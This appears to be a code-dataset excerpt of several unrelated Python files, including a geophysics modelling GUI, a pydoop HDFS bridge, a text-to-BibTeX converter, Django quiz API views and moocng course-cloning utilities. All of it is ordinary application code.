self.ploty)\n self.guide.set_data([], [])\n self.update()\n self.draw()\n if event.button == 3 or event.button == 2:\n self.isleft = not self.isleft\n self.draw_guide(x, y)\n self.draw()\n\n def key_press(self, event):\n pass\n\n\nclass BasinTri(Moulder):\n \"\"\"\n Interactive gravity modeling using a triangular model.\n\n The triangle has two surface nodes with fixed positions. The user can then\n model by controling the bottom node.\n\n Example::\n\n # Define the area of modeling\n area = (0, 1000, 0, 1000)\n # Where the gravity effect is calculated\n xp = range(0, 1000, 10)\n zp = [0]*len(xp)\n # Where the two surface nodes are. 
Use depth = 1 because direct\n # modeling doesn't like it when the model and computation points\n # coincide\n nodes = [[100, 1], [900, 1]]\n # Create the application\n app = BasinTri(area, nodes, xp, zp)\n # Run it (close the window to finish)\n app.run()\n # and save the calculated gravity anomaly profile\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * area : list = [xmin, xmax, zmin, zmax]\n Are of the subsuface to use for modeling. Remember, z is positive\n downward.\n * nodes : list of lists = [[x1, z1], [x2, z2]]\n x and z coordinates of the two top nodes. Must be in clockwise order!\n * xp, zp : array\n Arrays with the x and z coordinates of the computation points\n * gz : array\n The observed gravity values at the computation points.\n Will be plotted as black points together with the modeled (predicted)\n data. If None, will ignore this.\n\n \"\"\"\n\n instructions = \"Click to set node location\"\n name = \"BasinTri\"\n\n def __init__(self, area, nodes, xp, zp, gz=None):\n Moulder.__init__(self, area, xp, zp, gz)\n left, right = numpy.array(nodes) * 0.001\n z = 0.001 * 0.5 * (area[3] - area[2])\n x = 0.5 * (right[0] + left[0])\n self.polygons = [[left, right, [x, z]]]\n self.nextdens = -1000\n self.densslider.set_val(self.nextdens * 0.001)\n self.densities = [self.nextdens]\n self.plotx = [v[0] for v in self.polygons[0]]\n self.plotx.append(left[0])\n self.ploty = [v[1] for v in self.polygons[0]]\n self.ploty.append(left[1])\n self.polyline.set_data(self.plotx, self.ploty)\n self.polyline.set_color('k')\n self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',\n color='red', linewidth=2)\n\n def draw_guide(self, x, z):\n x0, z0 = self.polygons[0][0]\n x1, z1 = self.polygons[0][1]\n self.guide.set_data([x0, x, x1], [z0, z, z1])\n\n def move(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n self.draw_guide(event.xdata, event.ydata)\n self.draw()\n\n def set_density(self, value):\n self.densities[0] = 1000. * value\n self.update()\n self.draw()\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, y = event.xdata, event.ydata\n if (event.button == 1):\n self.polygons[0][2] = [x, y]\n self.plotx[2] = x\n self.ploty[2] = y\n self.polyline.set_data(self.plotx, self.ploty)\n self.guide.set_data([], [])\n self.update()\n self.draw()\n\n def key_press(self, event):\n pass\n\n\nclass Lasagne():\n\n \"\"\"\n Interactive modeling of vertical seismic profiling for 1D layered media.\n\n The wave source is assumed to be on the surface of a vertical borehole. The\n receivers are at given depths. What is measured is the travel-time of\n first arrivals.\n\n Assumes that the thickness of the layers are known. The user then only\n needs to choose the velocities.\n\n Example::\n\n # Define the thickness of the layers\n thickness = [10, 20, 5, 10]\n # Define the measuring points along the well\n zp = range(1, sum(thickness), 1)\n # Define the velocity range\n vmin, vmax = 1, 10000\n # Run the application\n app = Lasagne(thickness, zp, vmin, vmax)\n app.run()\n # Save the modeled data\n app.savedata(\"mydata.txt\")\n\n Parameters:\n\n * thickness : list\n The thickness of each layer in order of increasing depth\n * zp : list\n The depths of the measurement stations (seismometers)\n * vmin, vmax : float\n Range of velocities to allow\n * tts : array\n The observed travel-time values at the measurement stations. 
Will be\n plotted as black points together with the modeled (predicted) data.\n If None, will ignore this.\n\n \"\"\"\n\n instructions = \"Click to set the velocity of the layers\"\n name = \"Lasagne - Vertical seismic profiling for 1D layered media\"\n\n def __init__(self, thickness, zp, vmin, vmax, tts=None):\n if tts is not None:\n if len(tts) != len(zp):\n raise ValueError(\"zp and tts must have same size\")\n if vmin <= 0. or vmax <= 0.:\n raise ValueError(\"Can't have velocity vmin or vmax <= 0\")\n self.tts = tts\n self.zp = zp\n self.thickness = thickness\n # Make the figure\n self.fig = pyplot.figure(figsize=(14, 8))\n self.fig.canvas.set_window_title(self.name)\n self.fig.suptitle(self.instructions)\n self.draw = self.fig.canvas.draw\n # Make the data and model canvas\n self.dcanvas = self.fig.add_subplot(1, 2, 1)\n self.dcanvas.set_ylabel(\"Depth (m)\")\n self.dcanvas.set_xlabel(\"Travel-time (s)\")\n self.dcanvas.set_ylim(sum(thickness), 0)\n self.dcanvas.grid()\n self.dcanvas.set_ylim(sum(thickness), 0)\n self.mcanvas = self.fig.add_subplot(1, 2, 2)\n self.mcanvas.set_ylabel(\"Depth (m)\")\n self.mcanvas.set_xlabel(\"Velocity (m/s2)\")\n self.mcanvas.set_xlim(vmin, vmax)\n self.mcanvas.set_ylim(sum(thickness), 0)\n self.mcanvas.grid()\n self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.15,\n hspace=0.1)\n # Make the sliders\n sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])\n self.errslider = widgets.Slider(sliderax, 'Error',\n 0, 10, valinit=0.,\n valfmt='%2.1f (percent)')\n # Initialize the data\n self.error = 0.\n self.velocity = vmin * numpy.ones_like(thickness)\n self.predtts = profile.layered_straight_ray(thickness, self.velocity,\n zp)\n self.layers = [sum(thickness[:i]) for i in xrange(len(thickness) + 1)]\n self.predplot, = self.dcanvas.plot(self.predtts, zp, '-r', linewidth=2)\n if self.tts is not None:\n self.ttsplot, = self.dcanvas.plot(self.tts, self.zp, 'ok')\n self.ploty = [self.layers[0]]\n for y in self.layers[1:-1]:\n self.ploty.append(y)\n self.ploty.append(y)\n self.ploty.append(self.layers[-1])\n self.plotx = numpy.zeros_like(self.ploty)\n self.layerplot, = self.mcanvas.plot(self.plotx, self.ploty, 'o-k',\n linewidth=2)\n self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',\n color='red', linewidth=2)\n\n def run(self):\n self.connect()\n pyplot.show()\n\n def get_data(self):\n return self.predtts\n\n def savedata(self, fname):\n data = numpy.array([self.zp, self.predtts]).T\n numpy.savetxt(fname, data, fmt='%.5f')\n\n def connect(self):\n self.errslider.on_changed(self.set_error)\n self.fig.canvas.mpl_connect('button_press_event', self.pick)\n self.fig.canvas.mpl_connect('key_press_event', self.key_press)\n self.fig.canvas.mpl_connect('motion_notify_event', self.move)\n\n def set_error(self, value):\n self.error = 0.01 * value\n self.update()\n self.draw()\n\n def update(self):\n self.predtts = utils.contaminate(\n profile.layered_straight_ray(self.thickness, self.velocity,\n self.zp),\n self.error, percent=True)\n self.predplot.set_data(self.predtts, self.zp)\n if self.tts is not None:\n xmin = min(self.predtts.min(), self.tts.min())\n xmax = max(self.predtts.max(), self.tts.max())\n else:\n xmin = self.predtts.min()\n xmax = self.predtts.max()\n if xmin != xmax:\n self.dcanvas.set_xlim(xmin, xmax)\n\n def draw_guide(self, x, z):\n i = bisect.bisect(self.layers, z)\n if i > 0:\n z1 = self.layers[i - 1]\n z2 = self.layers[i]\n x1 = self.velocity[i - 1]\n self.guide.set_data([x1, x, x, x1], [z1, z1, z2, z2])\n\n def 
move(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n self.draw_guide(event.xdata, event.ydata)\n self.draw()\n\n def pick(self, event):\n if event.inaxes != self.mcanvas:\n return 0\n x, z = event.xdata, event.ydata\n if (event.button == 1):\n i = bisect.bisect(self.layers, z) - 1\n self.velocity[i] = x\n self.plotx[2 * i] = x\n self.plotx[2 * i + 1] = x\n self.layerplot.set_data(self.plotx, self.ploty)\n self.guide.set_data([], [])\n self.update()\n self.draw()\n\n def key_press(self, event):\n pass\n","sub_path":"fatiando/gui/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":21646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"407362620","text":"# BEGIN_COPYRIGHT\n#\n# Copyright 2009-2016 CRS4.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy\n# of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# END_COPYRIGHT\n\n\"\"\"\nJPype-bridged HDFS core implementation.\n\"\"\"\nimport os\n\nimport pydoop\nfrom pydoop.utils.bridge.factory import JavaWrapperFactory\n\n\ndef get_implementation_module():\n from . import hadoop\n return hadoop\n\n\ndef init(bridge_type):\n hadoop_classpath = pydoop.hadoop_classpath()\n if hadoop_classpath is None:\n raise RuntimeError('Hadoop classpath not set')\n classpath = os.environ.get('classpath', '.') + ':' + hadoop_classpath\n return JavaWrapperFactory(\n classpath=classpath, java_bridge_name=bridge_type\n )\n\n\nBRIDGE_TYPE = 'JPype'\ntry:\n _WRAPPER_FACTORY\nexcept NameError:\n _WRAPPER_FACTORY = init(BRIDGE_TYPE)\n\n\ndef get_wrapper_factory():\n return _WRAPPER_FACTORY\n","sub_path":"pydoop/hdfs/core/bridged/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"170398519","text":"class Article:\n def __init__(self, label, authorlist, title, journal, volume, number, year, pages, doi):\n self.label = label\n self.authorlist = authorlist\n self.title = title\n self.journal = journal\n self.volume = volume\n self.number = number\n self.year = year\n self.pages = pages\n self.doi = doi\n\n @classmethod\n def fromline(cls,line):\n stringlist = line.split('\"')\n authors = stringlist[0].split(',')[:-1]\n authorlist = []\n for author in authors:\n names = author.split(\" \")\n lastname = names[-1]\n firstnames = \" \".join([name for name in names[:-1] if name != 'and'])\n authorlist.append((lastname,firstnames))\n title = stringlist[1]\n journal = stringlist[2].split(\",\")[0]\n rest = stringlist[2].split(\",\")[1].split()\n volume = rest[0]\n number = '\"\"'\n year = \"\".join([c for c in rest[2] if c in \"0123456789\"])\n pages = rest[1]\n doi = \"\"\n label = authorlist[0][0]+year\n return Article(label, authorlist, title, journal, volume, number, year, pages, doi)\n\n def write(self):\n print(\"@article{%s,\" % self.label)\n print(' author = \"', end=\"\")\n for author in self.authorlist[:-1]:\n print(\"%s, %s and \" % (author[0],author[1]), end=\"\")\n lastauthor = self.authorlist[-1]\n print('%s, %s\",' % (lastauthor[0],lastauthor[1]))\n print(' title = \"%s\",' % self.title)\n print(' journal = \"%s\",' % self.journal)\n print(' volume = %s,' % self.volume)\n print(' number = %s,' % self.number)\n print(' year = %s,' % self.year)\n print(' pages = \"%s\",' % self.pages)\n print(' doi = \"%s\",' % self.doi)\n print(\"}\\n\")\n\n# @article{alleman2017,\n# author = \"Alleman, Coleman and Foulk, III., James W. and Mota, Alejandro and Lim, Hojun and Littlewood, David J.\",\n# title = \"Concurrent multiscale modeling of microstructural effects on localization behavior in finite deformation solid mechanics\",\n# journal = \"Computational Mechanics\",\n# volume = 61,\n# number = {1-2},\n# year = 2018,\n# pages = \"207--218\",\n# doi = \"10.1007/s00466-017-1481-5\",\n# }\n\n# label = \"alleman2017\"\n# authorlist = [\n# (\"Alleman\", \"Coleman\"), \n# (\"Foulk\", \"III., James W.\"), \n# (\"Mota\", \"Alejandro\"),\n# (\"Lim\", \"Hojun\"),\n# (\"Littlewood\", \"David J.\")\n# ]\n# title = \\\n# \"Concurrent multiscale modeling of microstructural effects on localization behavior in finite deformation solid mechanics\"\n# journal = \"Computational Mechanics\"\n# volume = \"61\"\n# number = \"{1-2}\"\n# year = \"2018\"\n# pages = \"207--218\"\n# doi = \"10.1007/s00466-017-1481-5\"\n\n# a = Article(label, authorlist, title, journal, volume, number, year, pages,doi)\n# a.write()\n\n# line = 'Y. Zuo, C. Chen, X. Li, Z. Deng, Y. Chen, J. Behler, G. Csnyi, A. V. Shapeev, A. P. Thompson, M. A. Wood, and S. P. Ong, \"A performance and cost assessment of machine learning interatomic potentials,\" J. Phys. Chem. A, 124 731 (2020).'\n\n# a = Article.fromline(line)\n# a.write()\n\nfilename = \"vita_2020.txt\"\nfile = open(filename,'r',encoding=\"utf-16\")\n\nstartflag = False\nwhile 1:\n line = file.readline()\n if \"PUBLICATIONS\" in line:\n startflag = True\n elif \"INVITED TALKS\" in line:\n break\n elif startflag:\n# print(line)\n if len(line) > 1:\n a = Article.fromline(line)\n a.write()\n\n","sub_path":"txt2bibtex.py","file_name":"txt2bibtex.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"509790409","text":"from account.models import MyUser, TakeQuiz\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import serializers, status\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import AND, IsAuthenticated\nfrom nanoid import generate\nfrom quizzes.models import Quizzes\nfrom quizzes.serializers import QuizzesSerializer, TakeQuizSerializer, UserProfileSerializer\nfrom topic.models import Topic\nfrom question.models import Question\nfrom question.serializers import QuestionSerializer, QuestionAnswerSerializer\nfrom datetime import datetime\nfrom answer.models import TakeAnswer\nfrom answer.serializers import TakeAnswerSerializer\nfrom rest_framework.renderers import JSONRenderer\n# from evaluate.similarity import Similarity\nimport random\n\n# Create your views here.\nclass QuizzesView(APIView):\n\n # authentication_classes = [TokenAuthentication]\n # permission_classes = [IsAuthenticated]\n def get(self, requests, code, user_id, format=None):\n data = Quizzes.objects.filter(topic=code)\n serializer = QuizzesSerializer(data, many=True)\n return Response(serializer.data)\n\n def post(self, requests, code, user_id, format=None):\n \"\"\"\n data = {\n \"title\":\"quiz q\",\n \"description\":\"desc\"\n }\n \"\"\"\n print(code)\n data = requests.data\n print(data)\n print(user_id)\n # topic = Topic.objects.get(code=data['topic'])\n # data['topic'] = topic\n # print(data['topic'])\n data['topic'] = code\n data['id'] = generate(size=15)\n print(data)\n serializer = QuizzesSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass TakeQuizView(APIView):\n \n def get(self, request, quiz_id, user_id, format=None):\n # try:\n user = MyUser.objects.get(id=user_id)\n print(user)\n quiz = Quizzes.objects.get(id=quiz_id)\n print(quiz)\n try: \n q = TakeQuiz.objects.get(user__id=user_id, quiz__id=quiz_id)\n id = q.id\n except: \n id = generate(size=20)\n print(id)\n similarity = None\n score = None\n user.quiz_taken.add(quiz, through_defaults={\n 'id': id, 'similarity': similarity, 'score':score\n })\n print(\"sebelum\")\n question = Question.objects.filter(quiz=quiz_id)\n print(question)\n data = QuestionSerializer(question, many=True).data\n data = {\"take_id\":id, \"question\": data}\n return Response(data, status=status.HTTP_201_CREATED)\n # except:\n # error = {\"message\": \"please check quiz_id or user_id\"}\n # return Response(error, status=status.HTTP_400_BAD_REQUEST)\n \n def put(self, request, quiz_id, user_id, format=None):\n take_id = request.data['take_id']\n takequiz = TakeQuiz.objects.get(id=take_id)\n a = TakeQuizSerializer(takequiz, data={'finished_at':datetime.now()}, partial=True)\n if a.is_valid():\n a.save()\n return Response(a.data, status=status.HTTP_201_CREATED)\n\nclass QuizTakenView(APIView):\n def get(self, request, quiz_id, user_id, format=None):\n user = MyUser.objects.filter(id=user_id)\n return Response(UserProfileSerializer(user, many=True).data)\n\nclass SubmitView(APIView):\n\n def post(self, request, quiz_id, user_id, format=None):\n \"\"\"\n data = { \"data\" : [\n {\n \"question\": \"question id \",\n \"student_answer\": \"answer\"\n },\n {\n \"question\": \"question id \",\n \"student_answer\": \"answer\"\n },\n ]\n }\n \"\"\"\n # similarity = 
Similarity()\n\n data = request.data\n data = data['data']\n\n try: \n take_id = TakeQuiz.objects.get(user__id=user_id, quiz__id=quiz_id)\n for row in data:\n x = row['student_answer'].lower()\n y = Question.objects.get(id=row['question']).answer.lower()\n print((x, y))\n # row['similarity'] = similarity.calculate(x, y)[0][0]\n row['take_id'] = take_id.id\n\n serializer = TakeAnswerSerializer(data=row)\n if serializer.is_valid():\n serializer.save()\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n message = {\"message\": \"You have successfully submitted\"}\n return Response(message, status=status.HTTP_201_CREATED)\n except: \n error = {\"message\": \"please check quiz_id or user_id\"}\n return Response(error, status=status.HTTP_400_BAD_REQUEST)\n\nclass AllReportView(APIView):\n\n def get(self, request, quiz_id, format=None):\n quiz = TakeQuiz.objects.filter(quiz__id=quiz_id)\n return Response(TakeQuizSerializer(quiz, many=True).data)\n\nclass DetailReportView(APIView):\n # renderer_classes = [JSONRenderer]\n def get(self, request, quiz_id, user_id, format=None):\n question_answer = Question.objects.filter(quiz__id=quiz_id)\n question_answer_data = QuestionAnswerSerializer(question_answer, many=True).data\n\n take_quiz = TakeQuiz.objects.get(user__id=user_id, quiz__id=quiz_id)\n\n take_answer = TakeAnswer.objects.filter(take_id__id=take_quiz.id)\n take_answer_data = TakeAnswerSerializer(take_answer, many=True).data\n List = []\n for a,b in zip(question_answer_data,take_answer_data):\n List.append({**a, **b})\n data = {\n \"name\": MyUser.objects.get(id=user_id).first_name,\n \"score\": take_quiz.score,\n \"data\": List\n }\n # print(type(data), type(serializer))\n return Response(data)\n\nclass CalculateView(APIView):\n\n def get(self, request, quiz_id, format=None):\n # #sim = Similarity()\n # threshold = 0.7\n # take_id_object = TakeQuiz.objects.filter(quiz=quiz_id)\n # for i in take_id_object.iterator():\n # take_answer_object = TakeAnswer.objects.filter(take_id=i.id)\n\n # score = 0\n # sum_similarity = 0\n # for j in take_answer_object.iterator():\n # question_id = j.question_id\n # answer = Question.objects.get(id=question_id).answer.lower()\n # student_answer = j.student_answer.lower()\n\n # #similarity = sim.calculate(student_answer, answer)[0][0]\n # similarity = random.uniform(0,1)\n # sum_similarity += similarity\n # true_or_false = False\n # if similarity >= threshold:\n # true_or_false = True\n # score += 1\n # a = TakeAnswerSerializer(j, data={'similarity':similarity, 'true_or_false':true_or_false}, partial=True)\n # if a.is_valid():\n # a.save()\n # #print(score, take_answer_object.count())\n # score = score / take_answer_object.count() * 100\n # sum_similarity = sum_similarity / take_answer_object.count()\n # take_quiz = TakeQuiz.objects.get(id=i.id)\n # take_quiz_serializer = TakeQuizSerializer(take_quiz, data={'score':score, 'similarity':sum_similarity}, partial=True)\n # if take_quiz_serializer.is_valid():\n # take_quiz_serializer.save()\n\n data = {\"message\":\"Yeay!!! the scores have been calculated\"}\n return Response(data, status=status.HTTP_200_OK)","sub_path":"quizzes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
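`CalculateView` above keeps its scoring loop commented out. Detached from Django and MongoDB, the core of that logic reduces to a threshold count over per-answer similarities; a standalone sketch (the 0.7 threshold comes from the commented code):

```python
# Standalone sketch of the threshold scoring that CalculateView comments
# out above: similarities >= threshold count as correct answers.
def score_answers(similarities, threshold=0.7):
    correct = sum(1 for s in similarities if s >= threshold)
    score = correct / len(similarities) * 100
    mean_similarity = sum(similarities) / len(similarities)
    return score, mean_similarity

print(score_answers([0.9, 0.65, 0.8]))  # (66.66..., 0.7833...)
```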
+{"seq_id":"3283521","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport json\nimport os\nimport requests\nimport time\nimport hashlib\nimport sys\nimport re\n\nfrom datetime import date, datetime\nfrom deep_serializer import serializer, deserializer\n\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.sites.models import Site\nfrom django.core.mail import get_connection, send_mass_mail, EmailMultiAlternatives, EmailMessage\nfrom django.template import loader\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext as _\n\nfrom moocng import mongodb\nfrom moocng.api.tasks import update_kq_mark, update_unit_mark, update_course_mark\nfrom moocng.badges.models import Badge\nfrom moocng.courses.models import Course, Unit, KnowledgeQuantum, Question, Option, Attachment, CourseStudent\nfrom moocng.courses.serializer import (CourseClone, UnitClone, KnowledgeQuantumClone,\n BaseMetaWalkClass, QuestionClone, PeerReviewAssignmentClone,\n EvaluationCriterionClone, OptionClone, AttachmentClone)\nfrom moocng.peerreview.models import PeerReviewAssignment, EvaluationCriterion\nfrom moocng.courses.marks import get_course_mark\n\nfrom moocng.courses.security import get_units_available_for_user\n\nfrom moocng.media_contents import get_media_type\nfrom bson.objectid import ObjectId\n\nlogger = logging.getLogger(__name__)\n\nTRACE_CLONE_COURSE_DIR = 'trace_clone_course'\nimport pymongo\n\nimport csv\ntry:\n import StringIO\nexcept Exception:\n from io import StringIO\nfrom HTMLParser import HTMLParser\n\n\ndef is_teacher(user, courses):\n\n \"\"\"\n Return if a user is teacher of a course or not\n\n :returns: Boolean\n\n .. versionadded:: 0.1\n \"\"\"\n is_teacher = False\n if isinstance(courses, Course):\n courses = [courses]\n if user.is_authenticated():\n for course in courses:\n is_teacher = is_teacher or course.teachers.filter(id=user.id).exists()\n return is_teacher\n\n\nUNIT_BADGE_CLASSES = {\n 'n': 'badge-inverse',\n 'h': 'badge-warning',\n 'e': 'badge-important',\n}\n\n\ndef get_unit_badge_class(unit):\n\n \"\"\"\n .. versionadded:: 0.1\n \"\"\"\n return UNIT_BADGE_CLASSES[unit.unittype]\n\n\ndef is_course_ready(course):\n\n \"\"\"\n Return if the current course is ready for users. This is done by comparing\n the start and end dates of the course.\n\n :returns: Boolean pair\n\n .. versionadded:: 0.1\n \"\"\"\n has_content = course.unit_set.count() > 0\n is_ready = True\n is_outdated = False\n ask_admin = False\n if course.start_date:\n is_ready = date.today() >= course.start_date\n if is_ready and not has_content:\n is_ready = False\n ask_admin = True\n is_outdated = date.today() > course.end_date\n else:\n if not has_content:\n is_ready = False\n ask_admin = True\n return (is_ready, ask_admin, is_outdated)\n\n\ndef send_mail_wrapper(subject, template, context, to):\n\n \"\"\"\n Simple wrapper on top of the django send_mail function.\n\n .. 
versionadded:: 0.1\n \"\"\"\n try:\n body = loader.render_to_string(template, context)\n email = EmailMessage(\n subject=subject,\n body=body,\n from_email=settings.DEFAULT_FROM_EMAIL,\n to=to\n )\n email.send()\n except IOError as ex:\n logger.error('The notification \"%s\" to %s could not be sent because of %s' % (subject, str(to), str(ex)))\n\n\ndef send_mass_mail_wrapper(subject, message, recipients, html_message=None):\n\n \"\"\"\n Simple wrapper on top of the django send_mass_mail function.\n\n .. versionadded: 0.1\n \"\"\"\n try:\n mails = []\n content = message\n for to in recipients:\n email = EmailMultiAlternatives(subject, content, settings.DEFAULT_FROM_EMAIL, [to])\n if html_message:\n email.attach_alternative(html_message, \"text/html\")\n mails.append(email)\n\n get_connection().send_messages(mails)\n except IOError as ex:\n logger.error('The massive email \"%s\" to %s could not be sent because of %s' % (subject, recipients, str(ex)))\n\n\ndef send_cloned_activity_email(original_course, copy_course, user):\n context = {'user': user,\n 'original_course': original_course,\n 'copy_course': copy_course,\n 'site': Site.objects.get_current()}\n message = render_to_string('courses/clone_course_activity.txt', context)\n html_message = render_to_string('courses/clone_course_activity.html', context)\n subject = _(settings.SUBJECT_CLONE_ACTIVITY)\n send_mass_mail_wrapper(subject, message, [user.email], html_message)\n\n\ndef get_trace_clone_file_name(original_course, copy_course):\n return '%s_original_pk_%s_copy_pk_%s.json' % (original_course.slug,\n original_course.pk,\n copy_course.pk)\n\n\ndef get_trace_clone_dir_path():\n return os.path.join(settings.MEDIA_ROOT, TRACE_CLONE_COURSE_DIR)\n\n\ndef get_trace_clone_file_path(file_name):\n return os.path.join(get_trace_clone_dir_path(), file_name)\n\n\ndef clone_course(course, request):\n \"\"\"\n Returns a clone of the course param and its relations\n \"\"\"\n walking_classes = {Course: CourseClone,\n User: BaseMetaWalkClass,\n Badge: BaseMetaWalkClass,\n Unit: UnitClone,\n KnowledgeQuantum: KnowledgeQuantumClone,\n Attachment: AttachmentClone,\n Question: QuestionClone,\n Option: OptionClone,\n PeerReviewAssignment: PeerReviewAssignmentClone,\n EvaluationCriterion: EvaluationCriterionClone}\n fixtures_format = 'json'\n fixtures_json = serializer(fixtures_format,\n initial_obj=course,\n walking_classes=walking_classes,\n natural_keys=True,\n request=request)\n objs = deserializer(fixtures_format,\n fixtures_json,\n initial_obj=course,\n walking_classes=walking_classes)\n course.slug = course.slug_original\n dir_path = get_trace_clone_dir_path()\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n file_name = get_trace_clone_file_name(course, objs[0])\n file_path = get_trace_clone_file_path(file_name)\n f = open(file_path, 'w')\n f.write(json.dumps(course.trace_ids, indent=4))\n if request:\n return objs, file_name\n return objs, file_path\n\n\ndef _clone_activity_user_course(mongo_db, trace_ids, user, copy_course, original_course):\n activity = mongo_db.get_collection('activity')\n original_act_docs = activity.find({\"user_id\": user.pk,\n \"course_id\": original_course.pk})\n new_act_docs = []\n for ori_act_doc in original_act_docs:\n try:\n ori_kq_id = str(int(ori_act_doc['kq_id']))\n ori_unit_id = str(int(ori_act_doc['unit_id']))\n except (ValueError, TypeError):\n continue\n new_act_doc = {}\n new_act_doc['user_id'] = user.pk\n new_act_doc['course_id'] = copy_course.pk\n try:\n new_act_doc['kq_id'] = 
trace_ids['KnowledgeQuantum'][ori_kq_id]\n new_act_doc['unit_id'] = trace_ids['Unit'][ori_unit_id]\n except KeyError:\n continue\n exists_doc = activity.find(new_act_doc).count() > 0\n if not exists_doc:\n new_act_docs.append(new_act_doc)\n if new_act_docs:\n activity.insert(new_act_docs)\n return new_act_docs\n\n\ndef _clone_answer_user_course(mongo_db, trace_ids, user, copy_course, original_course):\n answers = mongo_db.get_collection('answers')\n original_answer_docs = answers.find({\"user_id\": user.pk,\n \"course_id\": original_course.pk})\n insert_answer_docs = []\n update_answer_docs = {}\n for answer_doc in original_answer_docs:\n try:\n ori_kq_id = str(int(answer_doc['kq_id']))\n ori_question_id = str(int(answer_doc['question_id']))\n ori_unit_id = str(int(answer_doc['unit_id']))\n except (ValueError, TypeError):\n continue\n new_answer_doc = {}\n try:\n new_answer_doc['user_id'] = user.pk\n new_answer_doc['course_id'] = copy_course.pk\n new_answer_doc['kq_id'] = trace_ids['KnowledgeQuantum'][ori_kq_id]\n new_answer_doc['question_id'] = trace_ids['Question'][ori_question_id]\n new_answer_doc['unit_id'] = trace_ids['Unit'][ori_unit_id]\n except KeyError:\n continue\n exists_doc_without_reply = answers.find_one(new_answer_doc)\n replyList = answer_doc['replyList']\n if not isinstance(replyList, list):\n continue\n for reply in replyList:\n try:\n reply['option'] = trace_ids['Option'][str(int(reply['option']))]\n except KeyError:\n continue\n new_answer_doc['replyList'] = answer_doc['replyList']\n exists_doc = answers.find_one(new_answer_doc)\n if not exists_doc_without_reply:\n new_answer_doc['date'] = answer_doc['date']\n insert_answer_docs.append(new_answer_doc)\n elif exists_doc_without_reply and not exists_doc:\n update_answer_docs[exists_doc_without_reply['_id']] = new_answer_doc\n if insert_answer_docs:\n answers.insert(insert_answer_docs)\n if update_answer_docs:\n for _id, update_answer_doc in update_answer_docs.items():\n answers.update({'_id': _id},\n {'$set': {'replyList': update_answer_doc['replyList']}},\n upsert=True)\n return (insert_answer_docs, update_answer_docs)\n\n\ndef clone_activity_user_course(user, copy_course, original_course=None, force_email=False):\n if not original_course:\n original_course = copy_course.created_from\n if not original_course:\n raise ValueError(\"This course needs a original course\")\n try:\n course_student_relation = user.coursestudent_set.get(course=copy_course)\n except CourseStudent.DoesNotExist:\n return ([], [], [])\n\n file_name = get_trace_clone_file_name(original_course, copy_course)\n file_path = get_trace_clone_file_path(file_name)\n f = open(file_path)\n trace_ids = json.loads(f.read())\n f.close()\n if not copy_course.pk == trace_ids['Course'][str(original_course.pk)]:\n raise ValueError\n\n mongo_db = mongodb.get_db()\n\n new_act_docs = _clone_activity_user_course(mongo_db, trace_ids, user,\n copy_course, original_course)\n\n insert_answer_docs, update_answer_docs = _clone_answer_user_course(\n mongo_db, trace_ids, user,\n copy_course, original_course)\n\n if (new_act_docs or insert_answer_docs or update_answer_docs or\n course_student_relation.old_course_status != 'c' or force_email):\n if course_student_relation.old_course_status != 'c':\n course_student_relation.old_course_status = 'c'\n course_student_relation.save()\n if not settings.DEBUG:\n send_cloned_activity_email(original_course, copy_course, user)\n update_course_mark_by_user(copy_course, user)\n return (new_act_docs, insert_answer_docs, 
